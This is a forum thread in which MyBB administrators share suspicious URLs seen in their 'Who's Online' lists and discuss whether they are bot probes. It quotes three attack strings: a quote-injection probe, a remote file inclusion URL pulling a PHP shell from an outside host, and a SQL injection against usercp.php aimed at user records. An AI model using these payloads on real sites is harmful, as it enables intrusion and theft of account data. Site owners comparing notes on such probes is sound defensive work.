I was looking through the Who's Online list and someone (a not very welcomed "guest") was browing this page - misc.php?action=helpz\'z&hid=z\'z
Any ideas as to why someone would be doing such a thing?
it looks like a bot trying to find a weakness in MyBB.
i once found a guest visiting this link
misc.php?action=http://cl24zy.t35.com/shell.txt?
the weird thing, why is it that all cases till now are found in the misc.php
moreover that shell.txt contains php codes i think, as i didn't have time to look at it much because my Antivirus stopped me and considered that page a virus.
regards
Here's another one:
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*
A guest is on my site browsing that page.
I wonder if this is a security hole... when I get to my home PC and my test server I'll see if I can come up with anything... Won't be for a few days though.
zabava Wrote:Almost every my guest is in the unknown location, but when I click the unknown location they are on http://www.zabava.x10host.com/mybbsig.php
That's because users like us are viewing your signature. Your signature code uses global.php which creates a new guest session on your forum for each person who is viewing your signature.
You should put this code before your signature code includes global.php
define('NO_ONLINE', 1);